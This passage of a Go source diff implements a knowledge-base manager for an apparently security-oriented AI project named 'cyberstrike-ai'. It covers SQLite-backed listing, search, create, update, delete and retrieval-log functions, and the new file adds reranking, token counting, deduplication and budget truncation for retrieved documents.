|
||||
ORDER BY category
|
||||
`)
|
||||
if err != nil {
|
||||
return nil, 0, fmt.Errorf("查询分类失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
// 收集所有分类信息
|
||||
type categoryInfo struct {
|
||||
name string
|
||||
itemCount int
|
||||
}
|
||||
var allCategories []categoryInfo
|
||||
for rows.Next() {
|
||||
var info categoryInfo
|
||||
if err := rows.Scan(&info.name, &info.itemCount); err != nil {
|
||||
return nil, 0, fmt.Errorf("扫描分类失败: %w", err)
|
||||
}
|
||||
allCategories = append(allCategories, info)
|
||||
}
|
||||
|
||||
totalCategories := len(allCategories)
|
||||
|
||||
// 应用分页(按分类分页)
|
||||
var paginatedCategories []categoryInfo
|
||||
if limit > 0 {
|
||||
start := offset
|
||||
end := offset + limit
|
||||
if start >= totalCategories {
|
||||
paginatedCategories = []categoryInfo{}
|
||||
} else {
|
||||
if end > totalCategories {
|
||||
end = totalCategories
|
||||
}
|
||||
paginatedCategories = allCategories[start:end]
|
||||
}
|
||||
} else {
|
||||
paginatedCategories = allCategories
|
||||
}
|
||||
|
||||
// 为每个分类获取其下的知识项(只返回摘要,不包含完整内容)
|
||||
result := make([]*CategoryWithItems, 0, len(paginatedCategories))
|
||||
for _, catInfo := range paginatedCategories {
|
||||
// 获取该分类下的所有知识项
|
||||
items, _, err := m.GetItemsSummary(catInfo.name, 0, 0)
|
||||
if err != nil {
|
||||
return nil, 0, fmt.Errorf("获取分类 %s 的知识项失败: %w", catInfo.name, err)
|
||||
}
|
||||
|
||||
result = append(result, &CategoryWithItems{
|
||||
Category: catInfo.name,
|
||||
ItemCount: catInfo.itemCount,
|
||||
Items: items,
|
||||
})
|
||||
}
|
||||
|
||||
return result, totalCategories, nil
|
||||
}
|
||||
|
||||
// GetItems 获取知识项列表(完整内容,用于向后兼容)
|
||||
func (m *Manager) GetItems(category string) ([]*KnowledgeItem, error) {
|
||||
return m.GetItemsWithOptions(category, 0, 0, true)
|
||||
}
|
||||
|
||||
// GetItemsWithOptions 获取知识项列表(支持分页和可选内容)
|
||||
// category: 分类筛选(空字符串表示所有分类)
|
||||
// limit: 每页数量(0表示不限制)
|
||||
// offset: 偏移量
|
||||
// includeContent: 是否包含完整内容(false时只返回摘要)
|
||||
func (m *Manager) GetItemsWithOptions(category string, limit, offset int, includeContent bool) ([]*KnowledgeItem, error) {
|
||||
var rows *sql.Rows
|
||||
var err error
|
||||
|
||||
// 构建SQL查询
|
||||
var query string
|
||||
var args []interface{}
|
||||
|
||||
if includeContent {
|
||||
query = "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items"
|
||||
} else {
|
||||
query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items"
|
||||
}
|
||||
|
||||
if category != "" {
|
||||
query += " WHERE category = ?"
|
||||
args = append(args, category)
|
||||
}
|
||||
|
||||
query += " ORDER BY category, title"
|
||||
|
||||
if limit > 0 {
|
||||
query += " LIMIT ?"
|
||||
args = append(args, limit)
|
||||
if offset > 0 {
|
||||
query += " OFFSET ?"
|
||||
args = append(args, offset)
|
||||
}
|
||||
}
|
||||
|
||||
rows, err = m.db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询知识项失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var items []*KnowledgeItem
|
||||
for rows.Next() {
|
||||
item := &KnowledgeItem{}
|
||||
var createdAt, updatedAt string
|
||||
|
||||
if includeContent {
|
||||
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt); err != nil {
|
||||
return nil, fmt.Errorf("扫描知识项失败: %w", err)
|
||||
}
|
||||
} else {
|
||||
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
|
||||
return nil, fmt.Errorf("扫描知识项失败: %w", err)
|
||||
}
|
||||
// 不包含内容时,Content为空字符串
|
||||
item.Content = ""
|
||||
}
|
||||
|
||||
// 解析时间 - 支持多种格式
|
||||
timeFormats := []string{
|
||||
"2006-01-02 15:04:05.999999999-07:00",
|
||||
"2006-01-02 15:04:05.999999999",
|
||||
"2006-01-02T15:04:05.999999999Z07:00",
|
||||
"2006-01-02T15:04:05Z",
|
||||
"2006-01-02 15:04:05",
|
||||
time.RFC3339,
|
||||
time.RFC3339Nano,
|
||||
}
|
||||
|
||||
// 解析创建时间
|
||||
if createdAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, createdAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.CreatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 解析更新时间
|
||||
if updatedAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, updatedAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.UpdatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 如果更新时间为空,使用创建时间
|
||||
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
|
||||
item.UpdatedAt = item.CreatedAt
|
||||
}
|
||||
|
||||
items = append(items, item)
|
||||
}
|
||||
|
||||
return items, nil
|
||||
}
|
||||
|
||||
// GetItemsCount 获取知识项总数
|
||||
func (m *Manager) GetItemsCount(category string) (int, error) {
|
||||
var count int
|
||||
var err error
|
||||
|
||||
if category != "" {
|
||||
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items WHERE category = ?", category).Scan(&count)
|
||||
} else {
|
||||
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&count)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
return 0, fmt.Errorf("查询知识项总数失败: %w", err)
|
||||
}
|
||||
|
||||
return count, nil
|
||||
}
|
||||
|
||||
// SearchItemsByKeyword 按关键字搜索知识项(在所有数据中搜索,支持标题、分类、路径、内容匹配)
|
||||
func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*KnowledgeItemSummary, error) {
|
||||
if keyword == "" {
|
||||
return nil, fmt.Errorf("搜索关键字不能为空")
|
||||
}
|
||||
|
||||
// 构建SQL查询,使用LIKE进行关键字匹配(不区分大小写)
|
||||
var query string
|
||||
var args []interface{}
|
||||
|
||||
// SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数
|
||||
// 使用%keyword%进行模糊匹配
|
||||
searchPattern := "%" + keyword + "%"
|
||||
|
||||
query = `
|
||||
SELECT id, category, title, file_path, created_at, updated_at
|
||||
FROM knowledge_base_items
|
||||
WHERE (LOWER(title) LIKE LOWER(?) OR LOWER(category) LIKE LOWER(?) OR LOWER(file_path) LIKE LOWER(?) OR LOWER(content) LIKE LOWER(?))
|
||||
`
|
||||
args = append(args, searchPattern, searchPattern, searchPattern, searchPattern)
|
||||
|
||||
// 如果指定了分类,添加分类过滤
|
||||
if category != "" {
|
||||
query += " AND category = ?"
|
||||
args = append(args, category)
|
||||
}
|
||||
|
||||
query += " ORDER BY category, title"
|
||||
|
||||
rows, err := m.db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("搜索知识项失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var items []*KnowledgeItemSummary
|
||||
for rows.Next() {
|
||||
item := &KnowledgeItemSummary{}
|
||||
var createdAt, updatedAt string
|
||||
|
||||
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
|
||||
return nil, fmt.Errorf("扫描知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 解析时间
|
||||
timeFormats := []string{
|
||||
"2006-01-02 15:04:05.999999999-07:00",
|
||||
"2006-01-02 15:04:05.999999999",
|
||||
"2006-01-02T15:04:05.999999999Z07:00",
|
||||
"2006-01-02T15:04:05Z",
|
||||
"2006-01-02 15:04:05",
|
||||
time.RFC3339,
|
||||
time.RFC3339Nano,
|
||||
}
|
||||
|
||||
if createdAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, createdAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.CreatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if updatedAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, updatedAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.UpdatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
|
||||
item.UpdatedAt = item.CreatedAt
|
||||
}
|
||||
|
||||
items = append(items, item)
|
||||
}
|
||||
|
||||
return items, nil
|
||||
}
|
||||
|
||||
// GetItemsSummary 获取知识项摘要列表(不包含完整内容,支持分页)
|
||||
func (m *Manager) GetItemsSummary(category string, limit, offset int) ([]*KnowledgeItemSummary, int, error) {
|
||||
// 获取总数
|
||||
total, err := m.GetItemsCount(category)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
|
||||
// 获取列表数据(不包含内容)
|
||||
var rows *sql.Rows
|
||||
var query string
|
||||
var args []interface{}
|
||||
|
||||
query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items"
|
||||
|
||||
if category != "" {
|
||||
query += " WHERE category = ?"
|
||||
args = append(args, category)
|
||||
}
|
||||
|
||||
query += " ORDER BY category, title"
|
||||
|
||||
if limit > 0 {
|
||||
query += " LIMIT ?"
|
||||
args = append(args, limit)
|
||||
if offset > 0 {
|
||||
query += " OFFSET ?"
|
||||
args = append(args, offset)
|
||||
}
|
||||
}
|
||||
|
||||
rows, err = m.db.Query(query, args...)
|
||||
if err != nil {
|
||||
return nil, 0, fmt.Errorf("查询知识项失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var items []*KnowledgeItemSummary
|
||||
for rows.Next() {
|
||||
item := &KnowledgeItemSummary{}
|
||||
var createdAt, updatedAt string
|
||||
|
||||
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
|
||||
return nil, 0, fmt.Errorf("扫描知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 解析时间
|
||||
timeFormats := []string{
|
||||
"2006-01-02 15:04:05.999999999-07:00",
|
||||
"2006-01-02 15:04:05.999999999",
|
||||
"2006-01-02T15:04:05.999999999Z07:00",
|
||||
"2006-01-02T15:04:05Z",
|
||||
"2006-01-02 15:04:05",
|
||||
time.RFC3339,
|
||||
time.RFC3339Nano,
|
||||
}
|
||||
|
||||
if createdAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, createdAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.CreatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if updatedAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, updatedAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.UpdatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
|
||||
item.UpdatedAt = item.CreatedAt
|
||||
}
|
||||
|
||||
items = append(items, item)
|
||||
}
|
||||
|
||||
return items, total, nil
|
||||
}
|
||||
|
||||
// GetItem 获取单个知识项
|
||||
func (m *Manager) GetItem(id string) (*KnowledgeItem, error) {
|
||||
item := &KnowledgeItem{}
|
||||
var createdAt, updatedAt string
|
||||
err := m.db.QueryRow(
|
||||
"SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items WHERE id = ?",
|
||||
id,
|
||||
).Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt)
|
||||
|
||||
if err == sql.ErrNoRows {
|
||||
return nil, fmt.Errorf("知识项不存在")
|
||||
}
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 解析时间 - 支持多种格式
|
||||
timeFormats := []string{
|
||||
"2006-01-02 15:04:05.999999999-07:00",
|
||||
"2006-01-02 15:04:05.999999999",
|
||||
"2006-01-02T15:04:05.999999999Z07:00",
|
||||
"2006-01-02T15:04:05Z",
|
||||
"2006-01-02 15:04:05",
|
||||
time.RFC3339,
|
||||
time.RFC3339Nano,
|
||||
}
|
||||
|
||||
// 解析创建时间
|
||||
if createdAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, createdAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.CreatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 解析更新时间
|
||||
if updatedAt != "" {
|
||||
for _, format := range timeFormats {
|
||||
parsed, err := time.Parse(format, updatedAt)
|
||||
if err == nil && !parsed.IsZero() {
|
||||
item.UpdatedAt = parsed
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 如果更新时间为空,使用创建时间
|
||||
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
|
||||
item.UpdatedAt = item.CreatedAt
|
||||
}
|
||||
|
||||
return item, nil
|
||||
}
|
||||
|
||||
// CreateItem 创建知识项
|
||||
func (m *Manager) CreateItem(category, title, content string) (*KnowledgeItem, error) {
|
||||
id := uuid.New().String()
|
||||
now := time.Now()
|
||||
|
||||
// 构建文件路径
|
||||
filePath := filepath.Join(m.basePath, category, title+".md")
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
|
||||
return nil, fmt.Errorf("创建目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
|
||||
return nil, fmt.Errorf("写入文件失败: %w", err)
|
||||
}
|
||||
|
||||
// 插入数据库
|
||||
_, err := m.db.Exec(
|
||||
"INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
|
||||
id, category, title, filePath, content, now, now,
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("插入知识项失败: %w", err)
|
||||
}
|
||||
|
||||
return &KnowledgeItem{
|
||||
ID: id,
|
||||
Category: category,
|
||||
Title: title,
|
||||
FilePath: filePath,
|
||||
Content: content,
|
||||
CreatedAt: now,
|
||||
UpdatedAt: now,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// UpdateItem 更新知识项
|
||||
func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeItem, error) {
|
||||
// 获取现有项
|
||||
item, err := m.GetItem(id)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// 构建新文件路径
|
||||
newFilePath := filepath.Join(m.basePath, category, title+".md")
|
||||
|
||||
// 如果路径改变,需要移动文件
|
||||
if item.FilePath != newFilePath {
|
||||
// 确保新目录存在
|
||||
if err := os.MkdirAll(filepath.Dir(newFilePath), 0755); err != nil {
|
||||
return nil, fmt.Errorf("创建目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 移动文件
|
||||
if err := os.Rename(item.FilePath, newFilePath); err != nil {
|
||||
return nil, fmt.Errorf("移动文件失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除旧目录(如果为空)
|
||||
oldDir := filepath.Dir(item.FilePath)
|
||||
if isEmpty, _ := isEmptyDir(oldDir); isEmpty {
|
||||
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
|
||||
if oldDir != m.basePath {
|
||||
if err := os.Remove(oldDir); err != nil {
|
||||
m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(newFilePath, []byte(content), 0644); err != nil {
|
||||
return nil, fmt.Errorf("写入文件失败: %w", err)
|
||||
}
|
||||
|
||||
// 更新数据库
|
||||
_, err = m.db.Exec(
|
||||
"UPDATE knowledge_base_items SET category = ?, title = ?, file_path = ?, content = ?, updated_at = ? WHERE id = ?",
|
||||
category, title, newFilePath, content, time.Now(), id,
|
||||
)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("更新知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除旧的向量嵌入(需要重新索引)
|
||||
_, err = m.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", id)
|
||||
if err != nil {
|
||||
m.logger.Warn("删除旧向量嵌入失败", zap.Error(err))
|
||||
}
|
||||
|
||||
return m.GetItem(id)
|
||||
}
|
||||
|
||||
// DeleteItem 删除知识项
|
||||
func (m *Manager) DeleteItem(id string) error {
|
||||
// 获取文件路径
|
||||
var filePath string
|
||||
err := m.db.QueryRow("SELECT file_path FROM knowledge_base_items WHERE id = ?", id).Scan(&filePath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("查询知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除文件
|
||||
if err := os.Remove(filePath); err != nil && !os.IsNotExist(err) {
|
||||
m.logger.Warn("删除文件失败", zap.String("path", filePath), zap.Error(err))
|
||||
}
|
||||
|
||||
// 删除数据库记录(级联删除向量)
|
||||
_, err = m.db.Exec("DELETE FROM knowledge_base_items WHERE id = ?", id)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除知识项失败: %w", err)
|
||||
}
|
||||
|
||||
// 删除空目录(如果为空)
|
||||
dir := filepath.Dir(filePath)
|
||||
if isEmpty, _ := isEmptyDir(dir); isEmpty {
|
||||
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
|
||||
if dir != m.basePath {
|
||||
if err := os.Remove(dir); err != nil {
|
||||
m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 开头的文件)
|
||||
func isEmptyDir(dir string) (bool, error) {
|
||||
entries, err := os.ReadDir(dir)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
for _, entry := range entries {
|
||||
// 忽略隐藏文件(以 . 开头)
|
||||
if !strings.HasPrefix(entry.Name(), ".") {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// LogRetrieval 记录检索日志
|
||||
func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error {
|
||||
id := uuid.New().String()
|
||||
itemsJSON, _ := json.Marshal(retrievedItems)
|
||||
|
||||
_, err := m.db.Exec(
|
||||
"INSERT INTO knowledge_retrieval_logs (id, conversation_id, message_id, query, risk_type, retrieved_items, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
|
||||
id, conversationID, messageID, query, riskType, string(itemsJSON), time.Now(),
|
||||
)
|
||||
return err
|
||||
}
|
||||
|
||||
// GetIndexStatus 获取索引状态
|
||||
func (m *Manager) GetIndexStatus() (map[string]interface{}, error) {
|
||||
// 获取总知识项数
|
||||
var totalItems int
|
||||
err := m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询总知识项数失败: %w", err)
|
||||
}
|
||||
|
||||
// 获取已索引的知识项数(有向量嵌入的)
|
||||
var indexedItems int
|
||||
err = m.db.QueryRow(`
|
||||
SELECT COUNT(DISTINCT item_id)
|
||||
FROM knowledge_embeddings
|
||||
`).Scan(&indexedItems)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询已索引项数失败: %w", err)
|
||||
}
|
||||
|
||||
// 计算进度百分比
|
||||
var progressPercent float64
|
||||
if totalItems > 0 {
|
||||
progressPercent = float64(indexedItems) / float64(totalItems) * 100
|
||||
} else {
|
||||
progressPercent = 100.0
|
||||
}
|
||||
|
||||
// 判断是否完成
|
||||
isComplete := indexedItems >= totalItems && totalItems > 0
|
||||
|
||||
return map[string]interface{}{
|
||||
"total_items": totalItems,
|
||||
"indexed_items": indexedItems,
|
||||
"progress_percent": progressPercent,
|
||||
"is_complete": isComplete,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// GetRetrievalLogs 获取检索日志
|
||||
func (m *Manager) GetRetrievalLogs(conversationID, messageID string, limit int) ([]*RetrievalLog, error) {
|
||||
var rows *sql.Rows
|
||||
var err error
|
||||
|
||||
if messageID != "" {
|
||||
rows, err = m.db.Query(
|
||||
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE message_id = ? ORDER BY created_at DESC LIMIT ?",
|
||||
messageID, limit,
|
||||
)
|
||||
} else if conversationID != "" {
|
||||
rows, err = m.db.Query(
|
||||
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE conversation_id = ? ORDER BY created_at DESC LIMIT ?",
|
||||
conversationID, limit,
|
||||
)
|
||||
} else {
|
||||
rows, err = m.db.Query(
|
||||
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs ORDER BY created_at DESC LIMIT ?",
|
||||
limit,
|
||||
)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询检索日志失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var logs []*RetrievalLog
|
||||
for rows.Next() {
|
||||
log := &RetrievalLog{}
|
||||
var createdAt string
|
||||
var itemsJSON sql.NullString
|
||||
if err := rows.Scan(&log.ID, &log.ConversationID, &log.MessageID, &log.Query, &log.RiskType, &itemsJSON, &createdAt); err != nil {
|
||||
return nil, fmt.Errorf("扫描检索日志失败: %w", err)
|
||||
}
|
||||
|
||||
// 解析时间 - 支持多种格式
|
||||
var err error
|
||||
timeFormats := []string{
|
||||
"2006-01-02 15:04:05.999999999-07:00",
|
||||
"2006-01-02 15:04:05.999999999",
|
||||
"2006-01-02T15:04:05.999999999Z07:00",
|
||||
"2006-01-02T15:04:05Z",
|
||||
"2006-01-02 15:04:05",
|
||||
time.RFC3339,
|
||||
time.RFC3339Nano,
|
||||
}
|
||||
|
||||
for _, format := range timeFormats {
|
||||
log.CreatedAt, err = time.Parse(format, createdAt)
|
||||
if err == nil && !log.CreatedAt.IsZero() {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// 如果所有格式都失败,记录警告但继续处理
|
||||
if log.CreatedAt.IsZero() {
|
||||
m.logger.Warn("解析检索日志时间失败",
|
||||
zap.String("timeStr", createdAt),
|
||||
zap.Error(err),
|
||||
)
|
||||
// 使用当前时间作为fallback
|
||||
log.CreatedAt = time.Now()
|
||||
}
|
||||
|
||||
// 解析检索项
|
||||
if itemsJSON.Valid {
|
||||
json.Unmarshal([]byte(itemsJSON.String), &log.RetrievedItems)
|
||||
}
|
||||
|
||||
logs = append(logs, log)
|
||||
}
|
||||
|
||||
return logs, nil
|
||||
}
|
||||
|
||||
// DeleteRetrievalLog 删除检索日志
|
||||
func (m *Manager) DeleteRetrievalLog(id string) error {
|
||||
result, err := m.db.Exec("DELETE FROM knowledge_retrieval_logs WHERE id = ?", id)
|
||||
if err != nil {
|
||||
return fmt.Errorf("删除检索日志失败: %w", err)
|
||||
}
|
||||
|
||||
rowsAffected, err := result.RowsAffected()
|
||||
if err != nil {
|
||||
return fmt.Errorf("获取删除行数失败: %w", err)
|
||||
}
|
||||
|
||||
if rowsAffected == 0 {
|
||||
return fmt.Errorf("检索日志不存在")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
@@ -0,0 +1,213 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"strings"
|
||||
"sync"
|
||||
"unicode"
|
||||
"unicode/utf8"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"github.com/pkoukk/tiktoken-go"
|
||||
)
|
||||
|
||||
// postRetrieveMaxPrefetchCap 限制单次向量候选上限,避免误配置导致全表扫压力过大。
|
||||
const postRetrieveMaxPrefetchCap = 200
|
||||
|
||||
// DocumentReranker 可选重排(如交叉编码器 / 第三方 Rerank API),由 [Retriever.SetDocumentReranker] 注入;失败时在适配层降级为向量序。
|
||||
type DocumentReranker interface {
|
||||
Rerank(ctx context.Context, query string, docs []*schema.Document) ([]*schema.Document, error)
|
||||
}
|
||||
|
||||
// NopDocumentReranker 占位实现,便于测试或未启用重排时显式注入。
|
||||
type NopDocumentReranker struct{}
|
||||
|
||||
// Rerank implements [DocumentReranker] as no-op.
|
||||
func (NopDocumentReranker) Rerank(_ context.Context, _ string, docs []*schema.Document) ([]*schema.Document, error) {
|
||||
return docs, nil
|
||||
}
|
||||
|
||||
var tiktokenEncMu sync.Mutex
|
||||
var tiktokenEncCache = map[string]*tiktoken.Tiktoken{}
|
||||
|
||||
func encodingForTokenizerModel(model string) (*tiktoken.Tiktoken, error) {
|
||||
m := strings.TrimSpace(model)
|
||||
if m == "" {
|
||||
m = "gpt-4"
|
||||
}
|
||||
tiktokenEncMu.Lock()
|
||||
defer tiktokenEncMu.Unlock()
|
||||
if enc, ok := tiktokenEncCache[m]; ok {
|
||||
return enc, nil
|
||||
}
|
||||
enc, err := tiktoken.EncodingForModel(m)
|
||||
if err != nil {
|
||||
enc, err = tiktoken.GetEncoding("cl100k_base")
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
tiktokenEncCache[m] = enc
|
||||
return enc, nil
|
||||
}
|
||||
|
||||
func countDocTokens(text, model string) (int, error) {
|
||||
enc, err := encodingForTokenizerModel(model)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
toks := enc.Encode(text, nil, nil)
|
||||
return len(toks), nil
|
||||
}
|
||||
|
||||
// normalizeContentFingerprintKey 去重键:trim + 空白折叠(不改动大小写,避免合并仅大小写不同的代码片段)。
|
||||
func normalizeContentFingerprintKey(s string) string {
|
||||
s = strings.TrimSpace(s)
|
||||
var b strings.Builder
|
||||
b.Grow(len(s))
|
||||
prevSpace := false
|
||||
for _, r := range s {
|
||||
if unicode.IsSpace(r) {
|
||||
if !prevSpace {
|
||||
b.WriteByte(' ')
|
||||
prevSpace = true
|
||||
}
|
||||
continue
|
||||
}
|
||||
prevSpace = false
|
||||
b.WriteRune(r)
|
||||
}
|
||||
return b.String()
|
||||
}
|
||||
|
||||
func contentNormKey(d *schema.Document) string {
|
||||
if d == nil {
|
||||
return ""
|
||||
}
|
||||
n := normalizeContentFingerprintKey(d.Content)
|
||||
if n == "" {
|
||||
return ""
|
||||
}
|
||||
sum := sha256.Sum256([]byte(n))
|
||||
return hex.EncodeToString(sum[:])
|
||||
}
|
||||
|
||||
// dedupeByNormalizedContent 按规范化正文去重,保留向量检索顺序中首次出现的文档(同正文仅保留一条)。
|
||||
func dedupeByNormalizedContent(docs []*schema.Document) []*schema.Document {
|
||||
if len(docs) < 2 {
|
||||
return docs
|
||||
}
|
||||
seen := make(map[string]struct{}, len(docs))
|
||||
out := make([]*schema.Document, 0, len(docs))
|
||||
for _, d := range docs {
|
||||
if d == nil {
|
||||
continue
|
||||
}
|
||||
k := contentNormKey(d)
|
||||
if k == "" {
|
||||
out = append(out, d)
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[k]; ok {
|
||||
continue
|
||||
}
|
||||
seen[k] = struct{}{}
|
||||
out = append(out, d)
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// truncateDocumentsByBudget 按检索顺序整段保留文档,直至字符数或 token 数(任一启用)超限则停止。
|
||||
func truncateDocumentsByBudget(docs []*schema.Document, maxRunes, maxTokens int, tokenModel string) ([]*schema.Document, error) {
|
||||
if len(docs) == 0 {
|
||||
return docs, nil
|
||||
}
|
||||
unlimitedChars := maxRunes <= 0
|
||||
unlimitedTok := maxTokens <= 0
|
||||
if unlimitedChars && unlimitedTok {
|
||||
return docs, nil
|
||||
}
|
||||
|
||||
remRunes := maxRunes
|
||||
remTok := maxTokens
|
||||
out := make([]*schema.Document, 0, len(docs))
|
||||
|
||||
for _, d := range docs {
|
||||
if d == nil || strings.TrimSpace(d.Content) == "" {
|
||||
continue
|
||||
}
|
||||
runes := utf8.RuneCountInString(d.Content)
|
||||
if !unlimitedChars && runes > remRunes {
|
||||
break
|
||||
}
|
||||
var tok int
|
||||
var err error
|
||||
if !unlimitedTok {
|
||||
tok, err = countDocTokens(d.Content, tokenModel)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("token count: %w", err)
|
||||
}
|
||||
if tok > remTok {
|
||||
break
|
||||
}
|
||||
}
|
||||
out = append(out, d)
|
||||
if !unlimitedChars {
|
||||
remRunes -= runes
|
||||
}
|
||||
if !unlimitedTok {
|
||||
remTok -= tok
|
||||
}
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
// EffectivePrefetchTopK 计算向量检索应拉取的候选条数(供粗排 / 去重 / 重排)。
|
||||
func EffectivePrefetchTopK(topK int, po *config.PostRetrieveConfig) int {
|
||||
if topK < 1 {
|
||||
topK = 5
|
||||
}
|
||||
fetch := topK
|
||||
if po != nil && po.PrefetchTopK > fetch {
|
||||
fetch = po.PrefetchTopK
|
||||
}
|
||||
if fetch > postRetrieveMaxPrefetchCap {
|
||||
fetch = postRetrieveMaxPrefetchCap
|
||||
}
|
||||
return fetch
|
||||
}
|
||||
|
||||
